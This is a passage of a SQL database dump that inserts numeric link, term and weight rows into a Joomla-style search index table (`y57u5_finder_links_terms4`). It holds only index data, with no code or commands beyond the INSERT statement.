(251, 289496, 8.16981),
(252, 289611, 1.09669),
(252, 289612, 0.91),
(252, 289613, 0.95669),
(252, 289614, 1.05),
(252, 289615, 0.95669),
(252, 289616, 1.05),
(252, 289617, 0.86331),
(252, 289618, 1.02669),
(252, 289619, 0.42),
(252, 289620, 0.98),
(252, 289621, 1.09669),
(252, 289886, 0.93331),
(252, 289887, 1.02669),
(252, 289888, 0.37331),
(252, 289889, 1.00331),
(252, 289890, 1.12),
(252, 289891, 0.95669),
(252, 289892, 1.14331),
(252, 289893, 0.95669),
(252, 289894, 1.05),
(252, 289895, 1.12),
(252, 289896, 1.19),
(252, 289897, 1.02669),
(252, 290052, 0.91),
(252, 290053, 0.98),
(252, 290054, 0.86331),
(252, 290055, 0.98),
(252, 290056, 0.91),
(290, 290056, 0.91),
(305, 290056, 0.91),
(252, 290057, 1.02669),
(305, 290057, 1.02669),
(252, 290058, 0.93331),
(252, 290059, 1.00331),
(252, 290060, 2.1),
(252, 290061, 0.98),
(252, 290062, 1.02669),
(252, 290063, 1.05),
(252, 290064, 0.98),
(252, 290065, 0.88669),
(252, 290066, 0.98),
(252, 290067, 1.05),
(252, 290068, 1.00331),
(252, 290069, 1.14331),
(252, 290070, 1.00331),
(252, 290071, 1.05),
(252, 290072, 1.12),
(252, 290073, 1.21331),
(252, 290074, 1.00331),
(252, 290075, 1.05),
(252, 290076, 0.86331),
(252, 290077, 1.00331),
(252, 290078, 0.91),
(306, 290078, 0.91),
(252, 290079, 1.00331),
(252, 290080, 0.88669),
(252, 290081, 1.00331),
(252, 290082, 1.00331),
(252, 290083, 0.93331),
(252, 290084, 1.05),
(252, 290085, 1.02669),
(253, 290567, 0.93331),
(253, 290652, 0.98),
(253, 290653, 1.16669),
(253, 290654, 1.02669),
(253, 290655, 1.12),
(253, 290656, 1.14331),
(253, 290657, 1.05),
(253, 290658, 1.14331),
(253, 290659, 1.00331),
(253, 290660, 1.07331),
(253, 290661, 1.02669),
(253, 290662, 1.14331),
(253, 290663, 1.07331),
(253, 290664, 1.30669),
(253, 290665, 0.42),
(253, 290666, 0.98),
(253, 290667, 1.16669),
(253, 290668, 1.09669),
(253, 290669, 5.7),
(253, 290670, 1.05),
(253, 290671, 1.19),
(253, 290672, 0.93331),
(253, 290673, 0.98),
(253, 291051, 1.00331),
(253, 291052, 1.19),
(253, 291053, 1.05),
(253, 291054, 1.35331),
(253, 291055, 0.86331),
(253, 291056, 1.07331),
(253, 291220, 0.88669),
(253, 291221, 0.98),
(253, 291222, 0.86331),
(253, 291223, 0.95669),
(253, 291224, 0.84),
(306, 291224, 0.84),
(253, 291225, 0.95669),
(253, 291226, 0.32669),
(253, 291227, 1.05),
(253, 291228, 1.12),
(253, 291229, 0.93331),
(253, 291230, 1.05),
(253, 291231, 0.91),
(253, 291232, 1.05),
(253, 291233, 7.22019),
(253, 291234, 7.79019),
(253, 291235, 1.00331),
(253, 291236, 1.02669),
(253, 291237, 0.88669),
(253, 291238, 0.95669),
(253, 291239, 0.95669),
(253, 291240, 1.02669),
(253, 291241, 0.93331),
(253, 291242, 1.07331),
(253, 291243, 0.91),
(253, 291244, 1.05),
(253, 291245, 1.07331),
(253, 291246, 1.14331),
(253, 291247, 0.98),
(253, 291248, 1.12),
(253, 291249, 3.82676),
(253, 291250, 2.19338),
(253, 291251, 1.05),
(253, 291252, 1.09669),
(253, 291253, 2.05338),
(253, 291254, 1.02669),
(253, 291255, 1.07331),
(253, 291256, 1.16669),
(253, 291257, 1.07331),
(253, 291258, 1.02669),
(253, 291259, 1.05),
(253, 291260, 1.12),
(253, 291261, 1.02669),
(253, 291262, 1.07331),
(253, 291263, 1.05),
(253, 291264, 1.05),
(253, 291265, 1.02669),
(253, 291266, 1.23669),
(253, 291267, 0.91),
(253, 291268, 0.98),
(254, 291741, 0.46662),
(254, 291742, 0.91),
(254, 291743, 1.07331),
(254, 291744, 1.00331),
(254, 291745, 1.07331),
(254, 291746, 0.98),
(254, 291747, 0.91),
(254, 291748, 0.95669),
(254, 291749, 0.98),
(254, 291750, 0.98),
(254, 291751, 1.14331),
(254, 291752, 1.86662),
(254, 291753, 1.05),
(254, 291754, 1.02669),
(254, 291755, 1.96),
(254, 291756, 2.28662),
(254, 291757, 1.05),
(254, 291758, 1.07331),
(254, 291759, 0.37331),
(254, 291760, 1.02669),
(254, 291761, 1.19),
(254, 291762, 0.88669),
(254, 291763, 0.98),
(254, 291764, 0.37331),
(254, 291765, 0.95669),
(254, 291766, 1.05),
(254, 291767, 0.95669),
(254, 291768, 1.09669),
(254, 291769, 0.98),
(254, 291770, 0.91),
(254, 291771, 1.07331),
(254, 291772, 0.91),
(254, 291773, 1.02669),
(254, 291774, 1.02669),
(254, 291775, 1.19),
(254, 291776, 1.05),
(254, 291777, 1.16669),
(254, 291778, 1.09669),
(254, 291779, 1.16669),
(254, 291780, 0.98007),
(254, 291781, 0.93331),
(254, 291782, 0.98),
(254, 291783, 0.98),
(254, 291784, 1.09669),
(254, 291785, 1.16669),
(254, 291786, 1.26),
(254, 291787, 1.02669),
(254, 291788, 1.14331),
(254, 291789, 2.79993),
(254, 291790, 1.09669),
(254, 291791, 1.16669),
(254, 291792, 1.07331),
(254, 292225, 0.18669),
(254, 292226, 0.86331),
(254, 292227, 1.16669),
(254, 292228, 0.88669),
(254, 292229, 1.00331),
(254, 292230, 0.18669),
(254, 292231, 0.86331),
(254, 292232, 0.95669),
(254, 292233, 0.98),
(254, 292234, 1.07331),
(254, 292235, 1.12),
(254, 292236, 1.00331),
(254, 292237, 1.00331),
(254, 292238, 0.74662),
(254, 292239, 1.12),
(254, 292240, 1.33),
(254, 292241, 1.00331),
(254, 292242, 1.21331),
(254, 292243, 0.32669),
(254, 292244, 0.95669),
(254, 292245, 1.05),
(254, 292246, 1.00331),
(254, 292247, 1.02669),
(254, 292248, 1.09669),
(254, 292249, 0.93331),
(254, 292250, 1.05),
(254, 292251, 0.91),
(254, 292252, 0.98),
(254, 292253, 0.88669),
(254, 292254, 1.00331),
(254, 292255, 1.96),
(254, 292256, 1.19),
(254, 292257, 1.09669),
(254, 292258, 0.95669),
(254, 292259, 1.02669),
(254, 292541, 0.88669),
(287, 292541, 0.88669),
(254, 292542, 1.02669),
(254, 292543, 0.98),
(254, 292544, 1.07331),
(254, 292545, 0.88669),
(254, 292546, 1.07331),
(254, 292547, 0.95669),
(254, 292548, 1.02669),
(254, 292549, 1.77338),
(254, 292550, 1.00331),
(254, 292551, 1.00331),
(254, 292552, 0.98),
(254, 292553, 1.07331),
(254, 292554, 1.07331),
(254, 292555, 1.00331),
(254, 292556, 0.93331),
(254, 292557, 1.00331),
(254, 292558, 1.00331),
(254, 292559, 1.00331),
(254, 292560, 1.00331),
(254, 292561, 0.98),
(254, 292562, 1.05),
(254, 292563, 0.88669),
(254, 292564, 0.98),
(254, 292565, 1.00331),
(254, 292566, 0.88669),
(304, 292566, 0.88669),
(254, 292567, 1.12),
(254, 292568, 1.00331),
(254, 292569, 1.09669),
(254, 292570, 1.14331),
(254, 292571, 1.21331),
(254, 292572, 1.07331),
(254, 292573, 1.00331),
(254, 292574, 1.00331),
(254, 292575, 1.09669),
(254, 292576, 1.07331),
(254, 292577, 1.14331),
(254, 292578, 0.95669),
(254, 292579, 1.05),
(254, 292580, 1.09669),
(255, 292687, 0.95669),
(255, 292688, 1.05),
(255, 292689, 0.95669),
(255, 292690, 1.02669),
(255, 292691, 0.98),
(255, 292692, 1.05),
(255, 292693, 0.93331),
(255, 292694, 1.05),
(255, 292695, 1.02669),
(255, 292696, 1.35331),
(255, 292697, 0.95669),
(255, 292698, 1.02669),
(255, 292699, 0.46669),
(255, 292700, 1.00331),
(255, 292701, 1.07331),
(255, 292702, 1.21331),
(255, 292703, 1.07331),
(255, 292704, 1.16669),
(255, 292705, 0.32669),
(255, 292706, 0.95669),
(255, 292707, 1.14331),
(255, 292919, 1.00331),
(255, 292920, 1.12),
(255, 292921, 0.95669),
(255, 292922, 1.07331),
(255, 292923, 1.00331),
(255, 292924, 0.88669),
(255, 292925, 1.07331),
(255, 292926, 0.88669),
(255, 292927, 1.00331),
(255, 293077, 0.98),
(255, 293078, 1.05),
(255, 293079, 0.98),
(255, 293080, 1.00331),
(255, 293081, 0.93331),
(255, 293082, 1.14331),
(255, 293083, 1.02669),
(255, 293084, 0.88669),
(255, 293085, 1.00331),
(255, 293086, 0.93331),
(255, 293087, 1.05),
(255, 293088, 1.12),
(255, 293089, 1.09669),
(255, 293090, 1.02669),
(255, 293091, 1.05),
(255, 293092, 1.07331),
(255, 293093, 1.07331),
(255, 293094, 1.05),
(255, 293095, 2.00662),
(255, 293096, 1.05),
(255, 293097, 0.91),
(255, 293098, 1.02669),
(255, 293099, 0.91),
(255, 293100, 1.02669),
(256, 293223, 1.00331),
(256, 293224, 1.12),
(256, 293225, 1.39986),
(256, 293226, 0.98),
(256, 293227, 1.09669),
(256, 293228, 0.88669),
(256, 293229, 1.00331),
(256, 293230, 1.91338),
(256, 293231, 1.07331),
(256, 293232, 1.12),
(256, 293233, 0.91),
(256, 293234, 1.14331),
(256, 293235, 0.95669),
(256, 293236, 1.02669),
(256, 293237, 0.98),
(256, 293238, 1.07331),
(256, 293239, 0.95669),
(256, 293240, 1.07331),
(256, 293241, 1.00331),
(256, 293242, 1.09669),
(256, 293243, 1.05),
(256, 293244, 1.16669),
(256, 293245, 0.98),
(256, 293246, 1.07331),
(256, 293573, 0.18669),
(256, 293574, 0.88669),
(256, 293575, 0.98),
(256, 293576, 0.56),
(256, 293577, 1.09669),
(256, 293578, 1.21331),
(256, 293579, 0.93331),
(256, 293580, 1.09669),
(256, 293581, 0.42),
(256, 293582, 1.02669),
(256, 293583, 1.14331),
(256, 293584, 1.00331),
(256, 293585, 0.23331),
(256, 293586, 0.91),
(256, 293587, 1.07331),
(256, 293740, 0.91),
(256, 293741, 1.02669),
(256, 293742, 0.91),
(256, 293743, 0.98),
(256, 293744, 0.98),
(256, 293745, 1.07331),
(256, 293746, 1.14331),
(256, 293747, 1.05),
(256, 293748, 1.05),
(256, 293749, 1.09669),
(256, 293750, 1.07331),
(256, 293751, 1.00331),
(256, 293752, 0.98),
(256, 293753, 1.07331),
(256, 293754, 1.05),
(256, 293755, 1.00331),
(256, 293756, 1.09669),
(256, 293757, 1.00331),
(256, 293758, 1.09669),
(256, 293759, 1.12),
(256, 293760, 1.16669),
(256, 293761, 1.07331),
(256, 293762, 1.14331),
(256, 293763, 1.00331),
(256, 293764, 1.00331),
(256, 293765, 1.02669),
(256, 293766, 1.14331),
(256, 293767, 1.02669),
(256, 293768, 0.98),
(256, 293769, 1.09669),
(256, 293770, 1.12),
(256, 293771, 0.23331),
(256, 293772, 0.88669),
(256, 293773, 1.00331),
(257, 294231, 0.37331),
(298, 294231, 0.37331),
(304, 294231, 0.37331),
(257, 294232, 0.95669),
(298, 294232, 0.95669),
(304, 294232, 0.95669),
(257, 294233, 1.05),
(257, 294234, 0.81669),
(257, 294235, 0.95669),
(257, 294236, 0.88669),
(257, 294237, 1.05),
(257, 294238, 1.02669),
(257, 294239, 1.02669),
(257, 294240, 1.00331),
(257, 294241, 1.12),
(257, 294242, 0.95669),
(257, 294243, 0.95669),
(257, 294244, 1.12),
(257, 294245, 0.56),
(257, 294246, 1.09669),
(257, 294247, 1.16669),
(257, 294248, 1.02669),
(257, 294249, 1.14331),
(257, 294250, 1.23669),
(257, 294251, 0.32669),
(257, 294252, 0.91),
(257, 294253, 1.07331),
(257, 294526, 0.93331),
(257, 294527, 1.12),
(257, 294528, 1.07331),
(306, 294528, 1.07331),
(257, 294529, 1.19),
(257, 294530, 1.00331),
(257, 294531, 1.19),
(257, 294532, 1.00331),
(257, 294533, 1.09669),
(257, 294534, 0.95669),
(257, 294535, 1.12),
(257, 294707, 0.95669),
(257, 294708, 1.05),
(257, 294709, 1.09669),
(257, 294710, 0.98),
(292, 294710, 0.98),
(257, 294711, 0.93331),
(257, 294712, 1.19),
(257, 294713, 1.02669),
(257, 294714, 0.98),
(257, 294715, 0.95669),
(257, 294716, 0.98),
(257, 294717, 1.00331),
(257, 294718, 0.95669),
(306, 294718, 0.95669),
(257, 294719, 1.07331),
(257, 294720, 1.07331),
(257, 294721, 0.88669),
(257, 294722, 1.00331),
(257, 294723, 1.07331),
(257, 294724, 0.91),
(257, 294725, 0.98),
(257, 294726, 0.93331),
(257, 294727, 1.00331),
(257, 294728, 1.07331),
(257, 294729, 1.05),
(257, 294730, 1.00331),
(288, 294730, 2.00662),
(257, 294731, 1.00331),
(257, 294732, 1.12),
(257, 294733, 1.09669),
(257, 294734, 1.07331),
(257, 294735, 1.00331),
(257, 294736, 1.26),
(257, 294737, 0.95669),
(257, 294738, 1.00331),
(258, 295258, 0.93331),
(258, 295259, 1.05),
(258, 295260, 1.00331),
(258, 295261, 1.09669),
(258, 295262, 1.00331),
(258, 295263, 1.09669),
(258, 295264, 0.98),
(258, 295265, 1.07331),
(258, 295266, 1.86662),
(258, 295267, 0.95669),
(258, 295268, 0.98),
(258, 295269, 1.09669),
(258, 295597, 0.91),
(258, 295598, 1.00331),
(258, 295599, 1.00331),
(258, 295600, 1.12),
(258, 295601, 1.00331),
(306, 295601, 1.00331),
(258, 295602, 1.26),
(258, 295603, 0.93331),
(258, 295604, 1.09669),
(258, 295605, 0.93331),
(258, 295606, 1.02669),
(258, 295832, 0.81669),
(258, 295833, 0.88669),
(258, 295834, 1.72662),
(258, 295835, 1.86662),
(258, 295836, 1.09669),
(258, 295837, 0.91),
(258, 295838, 0.95669),
(258, 295839, 1.02669),
(258, 295840, 1.00331),
(258, 295841, 2.94),
(258, 295842, 3.15),
(258, 295843, 0.95669),
(258, 295844, 1.05),
(258, 295845, 0.91),
(258, 295846, 1.05),
(258, 295847, 1.02669),
(258, 295848, 1.21331),
(258, 295849, 1.00331),
(258, 295850, 1.09669),
(258, 295851, 1.00331),
(258, 295852, 1.07331),
(260, 296228, 1.02669),
(260, 296229, 1.12),
(261, 296381, 0.93331),
(261, 296382, 1.26),
(261, 296383, 0.95669),
(261, 296384, 0.93331),
(261, 296385, 1.00331),
(261, 296386, 1.09669),
(261, 296387, 0.91),
(261, 296388, 1.16669),
(261, 296389, 0.91),
(299, 296389, 0.91),
(261, 296390, 0.98),
(261, 296391, 0.91),
(261, 296392, 1.07331),
(261, 296393, 0.98),
(261, 296394, 0.32669),
(261, 296395, 0.95669),
(261, 296396, 1.05),
(261, 296397, 0.91),
(261, 296398, 1.09669),
(261, 296399, 1.05),
(261, 296400, 1.19),
(261, 296718, 0.91),
(261, 296719, 1.05),
(261, 296720, 0.93331),
(261, 296721, 1.19),
(261, 296722, 1.12),
(261, 296723, 1.09669),
(261, 296724, 1.14331),
(261, 296725, 0.91),
(261, 296726, 1.02669),
(261, 296727, 0.42),
(288, 296727, 0.42),
(261, 296728, 0.98),
(261, 296729, 1.07331),
(261, 296730, 1.07331),
(261, 296731, 1.16669),
(261, 296931, 1.00331),
(261, 296932, 2.00662),
(261, 296933, 1.07331),
(261, 296934, 1.05),
(261, 296935, 1.12),
(261, 296936, 0.98),
(261, 296937, 1.91338),
(261, 296938, 0.88669),
(261, 296939, 0.95669),
(261, 296940, 0.95669),
(261, 296941, 1.09669),
(261, 296942, 0.86331),
(306, 296942, 0.86331),
(292, 296942, 1.72662),
(261, 296943, 1.05),
(261, 296944, 1.05),
(261, 296945, 0.98),
(261, 296946, 0.98),
(261, 296947, 1.02669),
(261, 296948, 1.02669),
(261, 296949, 1.00331),
(261, 296950, 0.95669),
(261, 296951, 1.00331),
(261, 296952, 0.91),
(292, 296952, 0.91),
(305, 296952, 0.91),
(261, 296953, 0.98),
(261, 296954, 0.91),
(261, 296955, 1.02669),
(261, 296956, 0.88669),
(295, 296956, 0.88669),
(261, 296957, 1.05),
(292, 296958, 1.05),
(306, 296958, 5.25),
(261, 296958, 6.3),
(261, 296959, 1.19),
(261, 296960, 1.12),
(261, 296961, 3.71007),
(261, 296962, 1.16669),
(261, 296963, 0.98),
(261, 296964, 1.05),
(261, 296965, 1.16669),
(261, 296966, 1.02669),
(261, 296967, 1.07331),
(261, 296968, 0.98),
(306, 296968, 0.98),
(261, 296969, 1.05),
(261, 296970, 0.93331),
(261, 296971, 1.00331),
(261, 296972, 0.95669),
(261, 296973, 1.00331),
(261, 296974, 1.12),
(261, 296975, 1.19),
(261, 296976, 1.02669),
(261, 296977, 1.09669),
(261, 296978, 1.02669),
(261, 296979, 1.19),
(261, 296980, 1.07331),
(261, 296981, 1.07331),
(262, 297490, 0.93331),
(262, 297491, 1.09669),
(262, 297492, 1.77338),
(262, 297493, 1.86662),
(262, 297494, 1.07331),
(262, 297495, 0.98),
(262, 297496, 0.95669),
(262, 297497, 1.07331),
(262, 297498, 0.86331),
(262, 297499, 0.98),
(262, 297500, 0.95669),
(262, 297501, 1.12),
(262, 297502, 0.37331),
(262, 297503, 0.98),
(262, 297504, 1.07331),
(262, 297505, 1.09669),
(262, 297506, 1.19),
(262, 297507, 1.07331),
(262, 297508, 1.14331),
(262, 297509, 1.28331),
(262, 297510, 0.37331),
(262, 297511, 1.00331),
(262, 297512, 1.09669),
(262, 297513, 0.95669),
(262, 297514, 1.07331),
(262, 297515, 1.12),
(262, 297516, 1.21331),
(262, 297517, 0.46669),
(262, 297518, 1.09669),
(262, 297519, 1.16669),
(262, 297520, 0.23331),
(262, 297521, 0.93331),
(262, 297522, 1.09669),
(262, 297897, 1.00331),
(262, 297898, 0.88669),
(262, 297899, 0.95669),
(262, 297900, 0.88669),
(262, 297901, 1.02669),
(262, 297902, 0.42),
(262, 297903, 1.02669),
(262, 297904, 1.12),
(262, 297905, 1.02669),
(262, 297906, 1.12),
(262, 297907, 0.95669),
(262, 297908, 1.14331),
(262, 297909, 1.14331),
(262, 297910, 1.23669),
(262, 297911, 0.56),
(262, 297912, 1.12),
(262, 297913, 1.35331),
(262, 297914, 0.46669),
(262, 297915, 1.12),
(262, 297916, 0.18669),
(262, 297917, 0.88669),
(262, 297918, 1.02669),
(262, 297919, 1.07331),
(262, 297920, 0.28),
(262, 297921, 0.88669),
(262, 297922, 1.09669),
(262, 298279, 0.98),
(262, 298280, 1.02669),
(262, 298281, 0.95669),
(262, 298282, 1.16669),
(262, 298283, 1.05),
(262, 298284, 0.88669),
(262, 298285, 0.98),
(262, 298286, 0.91),
(262, 298287, 0.98),
(262, 298288, 0.88669),
(262, 298289, 1.02669),
(262, 298290, 1.09669),
(262, 298291, 1.00331),
(262, 298292, 1.12),
(262, 298293, 1.07331),
(262, 298294, 2.00662),
(262, 298295, 1.23669),
(262, 298296, 0.93331),
(262, 298297, 1.02669),
(262, 298298, 2.14662),
(262, 298299, 1.00331),
(262, 298300, 0.91),
(262, 298301, 1.02669),
(262, 298302, 0.98),
(262, 298303, 1.05),
(262, 298304, 0.91),
(262, 298305, 0.98),
(262, 298306, 2.00662),
(262, 298307, 1.05),
(262, 298308, 1.00331),
(262, 298309, 2.1),
(262, 298310, 1.07331),
(262, 298311, 2.05338),
(262, 298312, 8.4),
(262, 298313, 1.14331),
(262, 298314, 1.07331),
(262, 298315, 1.09669),
(262, 298316, 1.09669),
(262, 298317, 1.05),
(262, 298318, 1.07331),
(262, 298319, 1.07331),
(262, 298320, 1.07331),
(262, 298321, 1.19),
(262, 298322, 1.00331),
(262, 298323, 1.07331),
(263, 299458, 0.95669),
(263, 299459, 1.05),
(263, 299460, 0.88669),
(263, 299461, 0.95669),
(263, 299462, 0.98),
(263, 299463, 1.23669),
(263, 299464, 1.02669),
(263, 299465, 0.86331),
(263, 299466, 0.93331),
(263, 299467, 0.93331),
(263, 299468, 1.00331),
(263, 299469, 0.86331),
(263, 299470, 1.09669),
(263, 299471, 0.95669),
(263, 299472, 1.07331),
(263, 299473, 1.09669),
(263, 299474, 1.23669),
(263, 299475, 0.32669),
(263, 299476, 1.07331),
(263, 299477, 1.16669),
(263, 299478, 1.14331),
(263, 299479, 1.28331),
(263, 299480, 1.07331),
(263, 299481, 1.19),
(263, 299482, 0.93331),
(263, 299483, 1.05),
(263, 299484, 0.88669),
(263, 299485, 0.93331),
(263, 299486, 0.91),
(263, 299487, 1.00331),
(263, 299845, 1.00331),
(263, 299846, 1.07331),
(263, 299847, 1.23669),
(263, 299848, 0.51331),
(263, 299849, 1.12),
(263, 299850, 1.28331),
(263, 299851, 0.46669),
(263, 299852, 1.05),
(263, 299853, 1.23669),
(263, 299854, 0.98),
(263, 299855, 1.12),
(263, 299856, 0.91),
(263, 299857, 1.05),
(263, 299858, 1.21331),
(263, 299859, 1.4),
(263, 299860, 0.32669),
(263, 299861, 0.98),
(263, 299862, 1.09669),
(263, 299863, 0.95669),
(263, 299864, 1.12),
(263, 299865, 0.14),
(263, 299866, 0.84),
(263, 299867, 0.95669),
(263, 299868, 0.93331),
(263, 299869, 0.98),
(263, 299870, 0.23331),
(263, 299871, 1.05),
(263, 299872, 1.21331),
(263, 300082, 1.00331),
(263, 300083, 1.05),
(263, 300084, 0.91),
(263, 300085, 1.02669),
(263, 300086, 0.51331),
(263, 300087, 1.09669),
(263, 300088, 1.21331),
(263, 300089, 0.84),
(288, 300089, 0.84),
(263, 300090, 0.91),
(263, 300091, 0.91),
(263, 300092, 0.98),
(263, 300093, 1.05),
(263, 300094, 0.95669),
(263, 300095, 0.95669),
(263, 300096, 0.88669),
(305, 300096, 0.88669),
(263, 300097, 0.95669),
(305, 300097, 0.95669),
(263, 300098, 0.88669),
(263, 300099, 1.05),
(263, 300100, 1.02669),
(263, 300101, 0.95669),
(263, 300102, 1.07331),
(263, 300103, 1.00331),
(263, 300104, 1.12),
(263, 300105, 0.32669),
(263, 300106, 1.02669),
(263, 300107, 1.09669),
(263, 300108, 1.14331),
(263, 300109, 1.19),
(263, 300110, 1.00331),
(263, 300111, 1.02669),
(263, 300112, 1.05),
(263, 300113, 0.93331),
(263, 300114, 1.02669),
(263, 300115, 0.98),
(263, 300116, 1.02669),
(263, 300117, 1.02669),
(263, 300118, 1.19),
(263, 300119, 0.37331),
(263, 300120, 1.16669),
(263, 300121, 1.4),
(264, 300417, 0.95669),
(264, 300418, 1.00331),
(264, 300419, 1.02669),
(264, 300420, 0.91),
(264, 300421, 1.02669),
(264, 300422, 1.07331),
(264, 300423, 1.07331),
(264, 300424, 1.26),
(264, 300425, 0.95669),
(264, 300426, 1.00331),
(264, 300427, 0.98),
(264, 300428, 1.02669),
(264, 300429, 1.12),
(264, 300430, 1.19),
(264, 300431, 1.02669),
(264, 300432, 1.19),
(264, 300433, 0.88669),
(264, 300673, 0.95669),
(264, 300674, 1.09669),
(264, 300675, 1.14331),
(264, 300676, 0.95669),
(264, 300677, 1.09669),
(264, 300678, 0.98),
(264, 300679, 1.02669),
(264, 300680, 0.93331),
(264, 300681, 0.98),
(264, 300682, 0.95669),
(264, 300683, 1.05),
(264, 300684, 0.95669),
(264, 300685, 1.14331),
(264, 300686, 0.95669),
(264, 300687, 1.02669),
(264, 300810, 0.98),
(264, 300811, 1.00331),
(264, 300812, 1.00331),
(264, 300813, 1.05),
(264, 300814, 0.88669),
(288, 300814, 0.88669),
(292, 300814, 0.88669),
(264, 300815, 1.00331),
(264, 300816, 0.95669),
(264, 300817, 1.12),
(264, 300818, 1.00331),
(264, 300819, 0.98),
(264, 300820, 1.96),
(264, 300821, 2.28662),
(264, 300822, 1.00331),
(264, 300823, 1.07331),
(264, 300824, 0.98),
(264, 300825, 1.23669),
(264, 300826, 1.00331),
(264, 300827, 1.21331),
(267, 300878, 0.86331),
(267, 300879, 0.81669),
(267, 300880, 0.91),
(267, 300980, 1.16669),
(267, 300981, 0.91),
(267, 300982, 0.95669),
(267, 300983, 0.93331),
(267, 300984, 1.05),
(267, 300985, 0.28),
(267, 300986, 0.98),
(267, 300987, 1.09669),
(267, 300988, 0.42),
(267, 300989, 1.00331),
(267, 300990, 1.09669),
(267, 300991, 0.98),
(267, 300992, 1.19),
(267, 300993, 1.00331),
(267, 300994, 0.93338),
(267, 300995, 2.19338),
(267, 300996, 1.14331),
(267, 300997, 1.21331),
(267, 300998, 0.91),
(267, 300999, 0.98),
(267, 301000, 0.91),
(267, 301001, 0.95669),
(267, 301002, 1.02669),
(267, 301003, 0.95669),
(267, 301004, 1.05),
(267, 301005, 0.65331),
(305, 301005, 0.65331),
(267, 301006, 1.09669),
(267, 301007, 1.26),
(267, 301008, 1.21331),
(267, 301009, 0.98),
(267, 301010, 1.05),
(267, 301011, 0.98),
(267, 301012, 1.12),
(267, 301013, 0.46669),
(267, 301014, 1.02669),
(267, 301015, 1.28331),
(267, 301016, 1.07331),
(267, 301017, 0.42),
(267, 301018, 1.12),
(267, 301019, 1.23669),
(267, 301020, 0.88669),
(267, 301021, 0.93331),
(267, 301329, 0.93331),
(267, 301330, 1.02669),
(267, 301331, 0.91),
(267, 301332, 1.07331),
(267, 301333, 0.86331),
(267, 301334, 0.98),
(267, 301335, 0.88669),
(267, 301336, 0.98),
(267, 301337, 1.07331),
(267, 301338, 1.33),
(267, 301339, 1.09669),
(267, 301340, 1.21331),
(267, 301341, 1.05),
(267, 301342, 1.12),
(267, 301343, 0.98),
(267, 301344, 1.07331),
(267, 301345, 1.14331);
INSERT INTO `y57u5_finder_links_terms4` (`link_id`, `term_id`, `weight`) VALUES
(267, 301346, 1.26),
(267, 301347, 0.18669),
(267, 301348, 0.88669),
(267, 301349, 0.95669),
(267, 301496, 1.77338),
(304, 301496, 1.77338),
(267, 301497, 1.14331),
(267, 301498, 0.98),
(267, 301499, 1.00331),
(267, 301500, 1.02669),
(267, 301501, 1.00331),
(267, 301502, 0.93331),
(306, 301502, 0.93331),
(267, 301503, 1.05),
(267, 301504, 0.95669),
(267, 301505, 1.00331),
(267, 301506, 0.98),
(267, 301507, 1.72662),
(267, 301508, 1.09669),
(267, 301509, 0.98),
(267, 301510, 1.21331),
(267, 301511, 0.95669),
(267, 301512, 0.98),
(267, 301513, 0.95669),
(267, 301514, 1.09669),
(267, 301515, 1.00331),
(267, 301516, 1.12),
(267, 301517, 1.14331),
(267, 301518, 1.02669),
(267, 301519, 1.12),
(267, 301520, 1.00331),
(267, 301521, 0.98),
(267, 301522, 1.07331),
(267, 301523, 0.93331),
(267, 301524, 1.02669),
(267, 301525, 0.95669),
(306, 301525, 0.95669),
(267, 301526, 1.02669),
(268, 302023, 0.86331),
(268, 302024, 0.98),
(268, 302025, 0.18669),
(268, 302026, 0.88669),
(268, 302027, 1.00331),
(268, 302028, 0.95669),
(268, 302029, 0.37331),
(268, 302030, 1.02669),
(268, 302031, 1.21331),
(268, 302032, 0.37331),
(268, 302033, 1.07331),
(268, 302034, 1.19),
(268, 302035, 0.37331),
(268, 302036, 0.95669),
(268, 302037, 1.07331),
(268, 302038, 0.93331),
(268, 302039, 0.28),
(268, 302040, 0.91),
(268, 302041, 1.23669),
(268, 302042, 0.37331),
(268, 302043, 1.00331),
(268, 302044, 1.23669),
(268, 302045, 1.40007),
(268, 302046, 2.05338),
(268, 302047, 1.30669),
(268, 302048, 1.12),
(268, 302049, 1.14331),
(268, 302050, 1.21331),
(268, 302051, 0.23331),
(268, 302052, 0.88669),
(268, 302053, 0.98),
(268, 302396, 0.91),
(268, 302397, 1.00331),
(268, 302398, 0.18669),
(268, 302399, 0.88669),
(268, 302400, 1.05),
(268, 302401, 0.28),
(268, 302402, 0.91),
(268, 302403, 0.98),
(268, 302404, 0.51331),
(268, 302405, 1.09669),
(268, 302406, 1.26),
(268, 302407, 1.14331),
(268, 302408, 1.26),
(268, 302409, 1.12),
(268, 302410, 1.33),
(268, 302411, 1.05),
(268, 302412, 0.98),
(268, 302413, 0.91),
(268, 302414, 1.02669),
(268, 302415, 0.98),
(268, 302654, 0.88669),
(268, 302655, 1.09669),
(268, 302656, 1.12),
(268, 302657, 1.14331),
(268, 302658, 1.07331),
(268, 302659, 0.93331),
(288, 302659, 0.93331),
(268, 302660, 1.26),
(268, 302661, 1.05),
(268, 302662, 0.98),
(268, 302663, 1.09669),
(268, 302664, 0.91),
(268, 302665, 1.00331),
(292, 302665, 1.00331),
(306, 302665, 1.00331),
(268, 302666, 0.93331),
(288, 302666, 0.93331),
(268, 302667, 0.95669),
(268, 302668, 0.88669),
(268, 302669, 0.98),
(268, 302670, 0.88669),
(268, 302671, 1.12),
(268, 302672, 1.12),
(268, 302673, 1.00331),
(268, 302674, 0.93331),
(268, 302675, 0.98),
(268, 302676, 0.93331),
(288, 302676, 0.93331),
(268, 302677, 0.98),
(268, 302678, 0.88669),
(268, 302679, 0.95669),
(268, 302680, 1.02669),
(268, 302681, 0.98),
(268, 302682, 0.98),
(268, 302683, 2.73),
(268, 302684, 1.05),
(268, 302685, 1.00331),
(268, 302686, 1.09669),
(268, 302687, 1.09669),
(268, 302688, 1.02669),
(268, 302689, 1.00331),
(268, 302690, 1.16669),
(268, 302691, 0.98),
(268, 302692, 1.00331),
(268, 302693, 1.07331),
(268, 302694, 1.07331),
(268, 302695, 1.21331),
(268, 302696, 1.02669),
(268, 302697, 1.14331),
(268, 302698, 1.00331),
(268, 302699, 1.09669),
(268, 302700, 0.93331),
(268, 302701, 1.07331),
(268, 302702, 1.09669),
(268, 302703, 1.21331),
(269, 302915, 0.86331),
(269, 302916, 0.91),
(269, 302996, 0.84),
(269, 302997, 1.02669),
(269, 302998, 0.86331),
(269, 302999, 0.95669),
(269, 303000, 0.91),
(269, 303001, 1.02669),
(269, 303002, 0.91),
(269, 303003, 1.02669),
(269, 303004, 1.02669),
(269, 303005, 0.95669),
(269, 303006, 1.14331),
(269, 303007, 0.95669),
(269, 303008, 1.19),
(269, 303009, 3.08007),
(269, 303010, 0.95669),
(269, 303011, 1.07331),
(269, 303012, 0.91),
